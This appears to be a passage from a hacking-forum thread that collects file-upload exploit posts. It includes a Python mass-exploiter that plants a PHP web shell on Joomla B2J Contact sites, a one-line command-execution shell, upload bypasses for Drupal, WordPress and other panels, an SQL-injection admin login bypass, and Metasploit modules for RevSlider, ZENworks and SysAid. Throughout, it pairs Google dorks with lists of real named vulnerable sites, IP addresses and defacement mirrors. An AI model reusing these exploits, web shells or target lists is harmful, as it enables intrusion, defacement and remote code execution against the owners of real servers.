<td><center><form method=\"POST\" action=\"?option&path=$path\">
<select name=\"opt\">
<option value=\"\"></option>
<option value=\"delete\">Delete</option>
<option value=\"chmod\">Directory location</option>
<option value=\"rename\">Rename</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"dir\">
<input type=\"hidden\" name=\"name\" value=\"$dir\">
<input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
<input type=\"submit\" value=\">\" />
</form></center></td>
</tr>";
    }
    echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
    foreach ($scandir as $file) {
        if (!is_file("$path/$file")) continue;
        $size = filesize("$path/$file") / 1024;
        $size = round($size, 3);
        if ($size >= 1024) {
            $size = round($size / 1024, 2) . ' MB';
        } else {
            $size = $size . ' KB';
        }
        echo "<tr>
<td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
<td><center>" . $size . "</center></td>
<td><center>";
        if (is_writable("$path/$file")) echo '<font color="green">';
        elseif (!is_readable("$path/$file")) echo '<font color="red">';
        echo perms("$path/$file");
        if (is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
        echo "</center></td>
<td><center><form method=\"POST\" action=\"?option&path=$path\">
<select name=\"opt\">
<option value=\"\"></option>
<option value=\"delete\">Delete</option>
<option value=\"chmod\">Directory</option>
<option value=\"rename\">Rename</option>
<option value=\"edit\">Edit</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"file\">
<input type=\"hidden\" name=\"name\" value=\"$file\">
<input type=\"hidden\" name=\"path\" value=\"$path/$file\">
<input type=\"submit\" value=\">\" />
</form></center></td>
</tr>";
    }
    echo '</table>
</div>';
}
echo '<br />Only belongs to KingSkrupellos </font>, Recoded By <font color="red">KingSkrupellos / Cyberizm.Org |</font><br />Info: <font color="red">http://www.cyberizm.org/</font>
</BODY>
</HTML>';
function perms($file) {
    $perms = fileperms($file);
    if (($perms & 0xC000) == 0xC000) {        // Socket
        $info = 's';
    } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link
        $info = 'l';
    } elseif (($perms & 0x8000) == 0x8000) { // Regular
        $info = '-';
    } elseif (($perms & 0x6000) == 0x6000) { // Block special
        $info = 'b';
    } elseif (($perms & 0x4000) == 0x4000) { // Directory
        $info = 'd';
    } elseif (($perms & 0x2000) == 0x2000) { // Character special
        $info = 'c';
    } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe
        $info = 'p';
    } else {                                  // Unknown
        $info = 'u';
    }
    // Owner
    $info .= (($perms & 0x0100) ? 'r' : '-');
    $info .= (($perms & 0x0080) ? 'w' : '-');
    $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-'));
    // Group
    $info .= (($perms & 0x0020) ? 'r' : '-');
    $info .= (($perms & 0x0010) ? 'w' : '-');
    $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-'));
    // World
    $info .= (($perms & 0x0004) ? 'r' : '-');
    $info .= (($perms & 0x0002) ? 'w' : '-');
    $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-'));
    return $info;
}
?>"""

def Fox_Contact(url):
    # As posted: when adding the trailing slash it reads the global 'site', not 'url'.
    if url[-1] != "/":
        url = site + "/"
    if url[:7] != "http://" and url[:8] != "https://":
        url = "http://" + url
    return url

user_agent = {'User-agent': 'Mozilla/5.0'}
try:
    Filelist = open(sys.argv[1], 'r').readlines()
    for i in Filelist:
        try:
            url = i.strip()
            urlpa = urlparse(url)
            site = urlpa.netloc
            site = Fox_Contact(url)
            print "[#]Url:" + site
            req = urllib2.Request(url)
            opreq = urllib2.urlopen(req).read()
            b2jcomids = re.findall('<a name="b2jcomid_(.*?)"></a>', opreq)
            print "[+]Exploiting b2jcomid"
            for b2jcomid in b2jcomids:
                b2jcomid = str(b2jcomid)
                print "[#]b2jcomid:" + b2jcomid
                halah = str("common.php")
                # qqfile carries the traversal; the file lands under /components/com_b2jcontact/
                b0x_dir = [("index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../" + halah)]
                diretorios = 0
                for diretorio in b0x_dir:
                    diretorios += 1
                    url_vuln = site + diretorio
                    shell_dir = site + "/components/com_b2jcontact/" + halah + "?ina"
                    checa_site = r.get(url_vuln, headers=user_agent)
                    if '{"' in checa_site.text:
                        print("\n[!] exploiting in {}...".format(diretorios))
                        envia_shell = r.post(url_vuln, data=shell, headers=user_agent)
                        verifica_shell = r.get(shell_dir, headers=user_agent)
                        # The PHP payload above never prints "Cwd:", so this branch cannot be reached as posted.
                        if "Cwd:" in verifica_shell.text:
                            a = open('Attacker.txt', 'a')
                            a.write(shell_dir + '\n')
                            print("\n[*]Good 1 ")
                            print("[+] deface dir " + shell_dir)
                        else:
                            print("shell Upload *_* : ", shell_dir)
                    else:
                        print("\n[-] Fuck Sites : {}.".format(diretorios))
        except Exception as ex:
            print "[#]Fuck Site !~! "
    # As posted: runs the URL normaliser again over the list in 10 threads; it does not repeat the exploit.
    pool = ThreadPool(10)
    pool.map(Fox_Contact, Filelist)
    pool.close()
    pool.join()
except:
    print "[+] You not inputing list file"[/code]
#################################################################################################
CVE Details => cvedetails.com/vulnerability-list/vendor_id-16496/product_id-37996/Codextrous-B2j-Contact.html

CVE-2017-9030 The Codextrous B2J Contact (aka b2j_contact) extension before 2.1.13 for Joomla! allows a directory traversal attack that bypasses a uniqid protection mechanism, and makes it easier to read arbitrary uploaded files.

CVE-2017-5215 The Codextrous B2J Contact (aka b2j_contact) extension before 2.1.13 for Joomla! allows a rename attack that bypasses a "safe file extension" protection mechanism, leading to remote code execution.

CVE-2017-5214 The Codextrous B2J Contact (aka b2j_contact) extension before 2.1.13 for Joomla! allows prediction of a uniqid value based on knowledge of a time value. This makes it easier to read arbitrary uploaded files.
#################################################################################################
Another Exploiter Tool, Python Coded [ If the other exploit doesn't work, use this; only the shell code is changed ] ghostbin.com/paste/psoza - archive.is/sDumw
#################################################################################################
# Example Sites :
garrhotel.com/welcome/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"%20halah&lang=en
nuovaestetica.it/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah
masthamnsoperan.se/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah
raiffeisen-schwaben-allgaeu.de/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah
best-sl.fr/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah lsvgz.de/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"%20halah&lang=en strand-catering.com/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah drtoldilaszlo.hu/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../%22+halah kleintierverhalten.de/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../%22+halah infortelematica.it/site/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah cosmo-homes.com/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah hotelcorona.fg.it/joomla/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah hotelruas.net/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"%20halah&lang=en osteriasantatrinita.it/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah insentis.com/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../%22+halah ristorantepizzeriasanmartino.net/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../%22%20halah&lang=en wukrohr.de/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../%22+halah hubico.ch/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../%22%20halah&lang=en 
vr-lagerhaus-obb-so.de/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../%22%20halah&lang=en mercuriuscatering.nl/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../%22%20halah&lang=en rwg-essenbach.de/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../%22%20halah&lang=en liaisonsante.com/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../%22+halah + Proof of Concept for the Vulnerability : archive.is/rjRKz ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team # Original Reference Link => cyberizm.org/cyberizm-joomla-codextrous-com-b2jcontact-shell-upload-exploit.html #################################################################################################
  9. # Exploit Title : Drupal PaisDigital ArgentinaGov Municipality ContactForm Arbitrary File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Date : 01/06/2018
# Vendor Homepage : argentina.gob.ar/paisdigital
# Tested On : Windows
# Exploit Risk : High
# CWE-264 - [ Permissions, Privileges, and Access Controls ]
# CXSecurity : cxsecurity.com/ascii/WLB-2018060021
#################################################################################################
# Google Dork 1 : inurl:''/?q=contacto'' site:gob.ar
# Google Dork 2 : intext:''Los archivos deben ser menores que 2 MB.'' site:gob.ar
# Google Dork 3 : intext:''Tipos de archivo permitidos: gif jpg jpeg png txt rtf html pdf doc docx odt ppt pptx odp xls xlsx.'' site:gob.ar
# Exploit : /?q=contacto
# Path : /sites/default/files/webform/....
# Notes => Allowed File Extensions : gif jpg jpeg png txt rtf html pdf doc docx odt ppt pptx odp xls xlsx.
#################################################################################################
# Target IP Address => 186.33.254.182
# Example Vulnerable Sites => municipalidaddeaguascalientes.gob.ar/?q=contacto [ Proof of Concept ] => archive.is/d8GHu => archive.is/QTpnS
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
  10. # Exploit Title : Drupal 7 jQuery ItalianGov Fi.it Scrivi Al Comune Arbitrary File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 22/06/2018
# Vendor Homepage : regione.toscana.it - jquery.com
# Tested On : Windows
# Version : 7
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-287 [ Improper Authentication ] + CWE-284 [ Improper Access Control ]
# CXSecurity : cxsecurity.com/ascii/WLB-2018060240
#################################################################################################
# Google Dorks : intext:''Scrivi al Comune'' site:fi.it
Il testo del tuo messaggio * site:fi.it
# Exploits : /scrivi-al-comune /scrivi-al-comune-0 /segnalazioni-e-reclami-0 /scrivi-al-sindaco-0 /node/19
# Path : /sites/www.comune.DOMAINADDRESS.fi.it/files/webform/.....
# Note => Allowed File Extensions : gif jpg png tif txt rtf odf pdf doc docx xls xlsx.
# Don't forget to put www. before comune. on the URL Address bar.
#################################################################################################
# Example Vulnerable Sites and Target IP => 159.213.236.225 [ Proof of Concept for Vulnerability and Exploit ] => archive.is/zUN5z - archive.is/3IMxH
################################################################################################
Reference Topic Link [ It belongs to me ] => cyberizm.org/cyberizm-drupal-7-jquery-italia-fi-it-scrivi-al-comune-exploit.html
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
  11. #################################################################################################
# Exploit Title : WordPress DrcSystems EthicSolutions Jssor-Slider Library Plugin Arbitrary File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 19/06/2018
# Vendor Homepage : jssor.com - drcsystems.com - ethicsolutions.com - wordpress.org/plugins/jssor-slider/
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-284 [ Improper Access Control ] - CWE-862 [ Missing Authorization ]
# CXSecurity : cxsecurity.com/ascii/WLB-2018060226
#####################################################################################################
Description : “Jssor Slider by jssor.com” is open source software. Jssor Slider is professional, light weight and easy to use slideshow/slider/gallery/carousel/banner, it is optimized for mobile device with tons of unique features.
# Key Features : Touch Swipe - 200+ Slideshow Transitions - Layer Animation - Fast Loading, load slider html code from disk cache directly - High Performance Light Weight - Easy to Use - Repeated Layer Animation - Image Layer - Text/Html Layer - Panel Layer - Nested Layer - Layer Blending - Clip Mask Multiplex Transition - z-index Animation - Timeline Break - Dozens of bullet/arrow/thumbnail skins
#####################################################################################################
Affected Jssor Slider Plugin Code :
When the plugin is active the function register_ajax_calls() in the file /lib/jssor-slider-class.php is run: That gives anyone access to two AJAX functions that are only intended to be accessible to those logged in as Administrators. The upload_library() function accessible through that handles uploading a file through /lib/upload.php. That file also doesn’t do any checks as to who is making the request and does not restrict what type of files can be uploaded.
It is also possible to exploit this by sending a request directly to the file /lib/upload.php, as long as the undefined constant in that isn’t treated as an error. The following proof of concept will upload the selected file to the directory /wp-content/jssor-slider/jssor-uploads/. Make sure to replace “[path to WordPress]” with the location of WordPress.

public function register_ajax_calls() {
    if ( isset( $_REQUEST['action'] ) ) {
        switch ( $_REQUEST['action'] ) {
            case 'add_new_slider_library' :
                add_action( 'admin_init', 'jssor_slider_library' );
                function jssor_slider_library() {
                    include_once JSSOR_SLIDER_PATH . '/lib/add-new-slider-class.php';
                }
                break;
            case 'upload_library' :
                add_action( 'admin_init', 'upload_library' );
                function upload_library() {
                    include_once JSSOR_SLIDER_PATH . '/lib/upload.php';
                }
                break;
        }
    }
}
#####################################################################################################
# Google Dorks : inurl:''/wp-content/jssor-slider/jssor-uploads/''
intext:''Managed by Web development company Ethic Solutions''
intext:''Todos los derechos reservados © Ecuaauto - Distribuidor autorizado Chevrolet Ecuador''
intext:''Website Developed by DRC Systems''
#####################################################################################################
# PoC : /wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
# Error : {"jsonrpc" : "2.0", "result" : null, "id" : "id"}
# Exploit Code :
<html>
<body>
<form action="http://[PATH]/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library" method="POST" enctype="multipart/form-data" >
<input type="file" name="file" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
# Uploaded File Path : /wp-content/jssor-slider/jssor-uploads/.....
# Allowed File Extensions : With the exception of php and asp. [ Not Allowed ] But other files extensions are allowed. For example html and txt and et cetera....
# Usage : Use with XAMPP Control Panel and with your Localhost [ 127.0.0.1] localhost/jssorsliderexploiter.html
#################################################################################################
# Example All Vulnerable Sites =>
############################################################################
Reference [ Me ] : cyberizm.org/cyberizm-wordpress-drcsystems-ethicsolutions-jssorslider-exploit.html
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
  12. ***************************************************
# Exploit Title: Đăng nhập Arbitrary File Upload
# Google Dork: intext:Đăng nhập. Xác nhận. inurl:/xadmin
# Exploit: /dipnotpanel/js/tinymce/plugins/fileman/php/upload.php
# Date: 12/10/2018
# Author: 0N3R1D3R
# Team: Indonesia To World Team
# Tested on: Windows 10 x64
***************************************************
[+] Search the dork in Google
[+] Exploit the site with /editor/fileman/aklsdjfklsdjflksdkl.html
[+] Upload your backdoor with bypass ext
***************************************************
[+] Demo Site
[+] https://thietbibepkanzler.vn/editor/fileman/aklsdjfklsdjflksdkl.html
[+] http://kientrucla.com/editor/fileman/aklsdjfklsdjflksdkl.html
[+] https://www.songhonghanoi.com/editor/fileman/aklsdjfklsdjflksdkl.html
***************************************************
Thanks To Indonesia To World Team
  13. Title: jQuery-File-Upload <= v9.22.0 unauthenticated arbitrary file upload vulnerability
Author: Larry W. Cashdollar, @_larry0
Date: 2018-10-09
CVE-ID:[CVE-none]
Download Site: https://github.com/blueimp/jQuery-File-Upload/releases
Vendor: https://github.com/blueimp
Vendor Notified: 2018-10-09
Vendor Contact:
Advisory: http://www.vapidlabs.com/advisory.php?v=204
Description: File Upload widget with multiple file selection, drag&drop support, progress bar, validation and preview images, audio and video for jQuery. Supports cross-domain, chunked and resumable file uploads. Works with any server-side platform (Google App Engine, PHP, Python, Ruby on Rails, Java, etc.) that supports standard HTML form file uploads.
Vulnerability: The code in https://github.com/blueimp/jQuery-File-Upload/blob/master/server/php/UploadHandler.php doesn't require any validation to upload files to the server. It also doesn't exclude file types. This allows for remote code execution. This has been actively exploited in the wild for over a year.
Exploit Code:
$ curl -F "files=@shell.php" http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php
Where shell.php is:
<?php $cmd=$_GET['cmd']; system($cmd);?>
  14. # Exploit Title: Powered By CF Image Hosting script admin page bypass vulnerability / upload shell
# Exploit Author: Rednofozi
# Date:2018-10-11
# Email: Rednofozi@yahoo.com
# Vendor Homepage: www.codefuture.co.uk
# OUR SITE : https://anonysec.org
# MY page Exploit: https://www.exploit-db.com/author/?a=2243
|====================================================================================
# {INFO}
# admin bypass Vulnerability
|====================================================================================
# {DORK}
# intext:"Powered By CF Image Hosting script
|====================================================================================
# {POC}
# admin page:
# site.com/admin
# exploit:
# Username: '=''or'
# password: '=''or'
#
# zone-h test hacked http://www.zone-h.org/mirror/id/31702111
|====================================================================================
# {DEMO}
# 01: http://www.irtci.ir/pic/admin.php
# 02: http://image4web.net/admin/
# 03: https://admin.serconi.es/admin
# 04: and upload shell
|====================================================================================
# {TNX For}
# >>> Thanks To: ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow
# >>> Discovered By :Rednofozi
http://www.exploit4arab.org/exploits/2114
  15. http://www.exploit4arab.org/exploits/2087 Our first tool registered in this section
  16. ***************************************************
# Exploit Title: Dipnot Yönetim Paneli Arbitrary File Upload
# Google Dork: inurl:/dipnotpanel/js/tinymce/plugins/fileman
# Exploit: /dipnotpanel/js/tinymce/plugins/fileman/php/upload.php
# Date: 03/10/2018
# Author: 0N3R1D3R
# Team: Indonesia To World Team
# Tested on: Windows 10 x64
***************************************************
[+] Search the dork in Google
[+] Exploit the site with /dipnotpanel/js/tinymce/plugins/fileman/php/upload.php
[+] Upload your file with csrf, post file files[]
[+] Upload shell must with bypass ext
[+] Access the site with /dipnotpanel/js/tinymce/plugins/fileman/Uploads/file.jpg
***************************************************
[+] Demo Site
[+] http://www.mikronmadencilik.com/dipnotpanel/js/tinymce/plugins/fileman/php/upload.php
[+] http://www.arinna.com.tr/dipnotpanel/js/tinymce/plugins/fileman/php/upload.php
[+] http://www.aegee-eskisehir.org/dipnotpanel/js/tinymce/plugins/fileman/php/upload.php
***************************************************
Thanks To Indonesia To World Team
  17. #################################################################################################
# Exploit Title : Joomla Com_BibleStudy Proclaim MediaFileForm Remote File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 28/09/2018
# Vendor Homepage : joomlabiblestudy.org ~ extensions.joomla.org/extension/proclaim/
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CVE: CVE-2018-7316
# CWE : CWE-264 [ Permissions, Privileges, and Access Controls ]
#################################################################################################
# Google Dork : inurl:''/index.php?option=com_biblestudy''
# Exploit : TARGET/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1
# Note : Go to the '' Media Files '' Category. Choose your File and Upload it.
# Directory File Path : TARGET/images/biblestudy/media/....
#################################################################################################
# Example Vulnerable Sites =>
kalamekhuda.com/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1 => [ Proof of Concept for Vulnerability and Proof of Mirror ] => archive.is/nfskL => archive.is/5NaKe
hereatcalvary.org/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1 [ Proof of Concept ] => archive.is/oEPx3
cclivinghope.org/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
  18. .. by Rednofozi anonysec hackers iran ..
====================================================================================
# Exploit Title: Image Hosting script admin page bypass vulnerability / upload shell
# Exploit Author: Rednofozi
# Date:26-09-2018
# Email: Rednofozi@yahoo.com
# Vendor Homepage: www.codefuture.co.uk
# OUR SITE : https://anonysec.org
|====================================================================================
# {INFO}
# admin bypass Vulnerability
|====================================================================================
# {DORK}
# intext:"Powered By CF Image Hosting script
|====================================================================================
# {POC}
# admin page:
# site.com/admin
# exploit:
# Username: '=''or'
# password: '=''or'
#
# zone-h test hacked http://www.zone-h.org/mirror/id/31702111
|====================================================================================
# {DEMO}
# 01: http://www.irtci.ir/pic/admin.php
# 02: http://image4web.net/admin/
# 03: https://admin.serconi.es/admin
# 04: and upload shell
|====================================================================================
# {TNX For}
# >>> Thanks To: ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow
# >>> Discovered By :Rednofozi
|====================================================================================
The END ; Good Luck :D:D:D
http://www.exploit4arab.org/exploits/2051
  19. ****************************************************************
# Exploit Title: Israel site login Bypass and upload your shell
# Google Dork:"inurl:/page.asp?NewsID= & /page.asp?PageID= site.il
# Date: 22/09/2018
# Author: Rednofozi
# Vendor Homepage :http://www.ekdesign.co.il/
# Team: https://anonysec.org
# Tested on: Kali Linux and win
***************************************************************|
|[+] Exploit :
|[+]
|[+] Admin panel:
[+] Vulnerability
[+] http://www.dt-law.co.il/admin/[UPLOAD]
[+] www.site.com/modules/admin/[UPLOAD]
|--------------------------------------------------------------|
|[+] Demo:-
|[+] http://testcar.co.il/admin/[UPLOAD]
|[+] http://testcar.co.il/admin/upload.asp
|[+] http://www.pgs-law.co.il/admin/upload.asp
|[+] http://www.dt-law.co.il/admin/upload.asp
Bypass and upload your shell , TamperData .. img.jpg.pjpeg << Good luck
|--------------------------------------------------------------|
****************************************************************
Discovered by : Rednofozi
Thanks To: ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow
http://www.exploit4arab.org/exploits/2045
  20. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::HTTP::Wordpress include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Wordpress RevSlider File Upload and Execute Vulnerability', 'Description' => %q{ This module exploits an arbitrary PHP code upload in the WordPress ThemePunch Revolution Slider ( revslider ) plugin, version 3.0.95 and prior. The vulnerability allows for arbitrary file upload and remote code execution. }, 'Author' => [ 'Simo Ben youssef', # Vulnerability discovery 'Tom Sellers <tom[at]fadedcode.net>' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'https://whatisgon.wordpress.com/2014/11/30/another-revslider-vulnerability/'], ['EDB', '35385'], ['WPVDB', '7954'], ['OSVDB', '115118'] ], 'Privileged' => false, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['ThemePunch Revolution Slider (revslider) 3.0.95', {}]], 'DisclosureDate' => 'Nov 26 2015', 'DefaultTarget' => 0) ) end def check release_log_url = normalize_uri(wordpress_url_plugins, 'revslider', 'release_log.txt') check_version_from_custom_file(release_log_url, /^\s*(?:version)\s*(\d{1,2}\.\d{1,2}(?:\.\d{1,2})?).*$/mi, '3.0.96') end def exploit php_pagename = rand_text_alpha(4 + rand(4)) + '.php' # Build the zip payload_zip = Rex::Zip::Archive.new # If the filename in the zip is revslider.php it will be automatically # executed but it will break the plugin and sometimes WordPress payload_zip.add_file('revslider/' + php_pagename, payload.encoded) # Build the POST body data = Rex::MIME::Message.new data.add_part('revslider_ajax_action', nil, nil, 'form-data; name="action"') data.add_part('update_plugin', nil, nil, 'form-data; name="client_action"') data.add_part(payload_zip.pack, 'application/x-zip-compressed', 'binary', "form-data; 
name=\"update_file\"; filename=\"revslider.zip\"") post_data = data.to_s res = send_request_cgi( 'uri' => wordpress_url_admin_ajax, 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data ) if res if res.code == 200 && res.body =~ /Update in progress/ # The payload itself almost never deleted, try anyway register_files_for_cleanup(php_pagename) # This normally works register_files_for_cleanup('../revslider.zip') final_uri = normalize_uri(wordpress_url_plugins, 'revslider', 'temp', 'update_extract', 'revslider', php_pagename) print_good("#{peer} - Our payload is at: #{final_uri}") print_status("#{peer} - Calling payload...") send_request_cgi( 'uri' => normalize_uri(final_uri), 'timeout' => 5 ) elsif res.code == 200 && res.body =~ /^0$/ # admin-ajax.php returns 0 if the 'action' 'revslider_ajax_action' is unknown fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable or the plugin is deactivated") else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") end else fail_with(Failure::Unknown, 'ERROR') end end end
  21. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Novell ZENworks Configuration Management Arbitrary File Upload', 'Description' => %q{ This module exploits a file upload vulnerability in Novell ZENworks Configuration Management (ZCM, which is part of the ZENworks Suite). The vulnerability exists in the UploadServlet which accepts unauthenticated file uploads and does not check the "uid" parameter for directory traversal characters. This allows an attacker to write anywhere in the file system, and can be abused to deploy a WAR file in the Tomcat webapps directory. ZCM up to (and including) 11.3.1 is vulnerable to this attack. This module has been tested successfully with ZCM 11.3.1 on Windows and Linux. Note that this is a similar vulnerability to ZDI-10-078 / OSVDB-63412 which also has a Metasploit exploit, but it abuses a different parameter of the same servlet. 
}, 'Author' => [ 'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2015-0779'], ['OSVDB', '120382'], ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/zenworks_zcm_rce.txt'], ['URL', 'http://seclists.org/fulldisclosure/2015/Apr/21'] ], 'DefaultOptions' => { 'WfsDelay' => 30 }, 'Privileged' => true, 'Platform' => 'java', 'Arch' => ARCH_JAVA, 'Targets' => [ [ 'Novell ZCM < v11.3.2 - Universal Java', { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 7 2015')) register_options( [ Opt::RPORT(443), OptBool.new('SSL', [true, 'Use SSL', true]), OptString.new('TARGETURI', [true, 'The base path to ZCM / ZENworks Suite', '/zenworks/']), OptString.new('TOMCAT_PATH', [false, 'The Tomcat webapps traversal path (from the temp directory)']) ], self.class) end def check res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'UploadServlet'), 'method' => 'GET' }) if res && res.code == 200 && res.body.to_s =~ /ZENworks File Upload Servlet/ return Exploit::CheckCode::Detected end Exploit::CheckCode::Safe end def upload_war_and_exec(tomcat_path) app_base = rand_text_alphanumeric(4 + rand(32 - 4)) war_payload = payload.encoded_war({ :app_name => app_base }).to_s print_status("#{peer} - Uploading WAR file to #{tomcat_path}") res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'UploadServlet'), 'method' => 'POST', 'data' => war_payload, 'ctype' => 'application/octet-stream', 'vars_get' => { 'uid' => tomcat_path, 'filename' => "#{app_base}.war" } }) if res && res.code == 200 print_status("#{peer} - Upload appears to have been successful") else print_error("#{peer} - Failed to upload, try again with a different path?") return false end 10.times do Rex.sleep(2) # Now make a request to trigger the newly deployed war print_status("#{peer} - Attempting to launch payload in deployed WAR...") send_request_cgi({ 'uri' => normalize_uri(app_base, 
Rex::Text.rand_text_alpha(rand(8)+8)), 'method' => 'GET' }) # Failure. The request timed out or the server went away. break if res.nil? # Failure. Unexpected answer break if res.code != 200 # Unless session... keep looping return true if session_created? end false end def exploit tomcat_paths = [] if datastore['TOMCAT_PATH'] tomcat_paths << datastore['TOMCAT_PATH'] end tomcat_paths.concat(['../../../opt/novell/zenworks/share/tomcat/webapps/', '../webapps/']) tomcat_paths.each do |tomcat_path| break if upload_war_and_exec(tomcat_path) end end end
  22. mohammad_ghazei

    Hacking

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'zlib'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "SysAid Help Desk 'rdslogs' Arbitrary File Upload",
      'Description'    => %q{
        This module exploits a file upload vulnerability in SysAid Help Desk v14.3 and v14.4.
        The vulnerability exists in the RdsLogsEntry servlet which accepts unauthenticated
        file uploads and handles zip file contents in an insecure way. By combining both
        weaknesses, a remote attacker can accomplish remote code execution. Note that this
        will only work if the target is running Java 6 or 7 up to 7u25, as Java 7u40 and
        above introduces a protection against null byte injection in file names.
        This module has been tested successfully on version v14.3.12 b22 and v14.4.32 b25
        in Linux. In theory this module also works on Windows, but SysAid seems to bundle
        Java 7u40 and above with the Windows package which prevents the vulnerability from
        being exploited.
      },
      'Author'         =>
        [
          'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2015-2995' ],
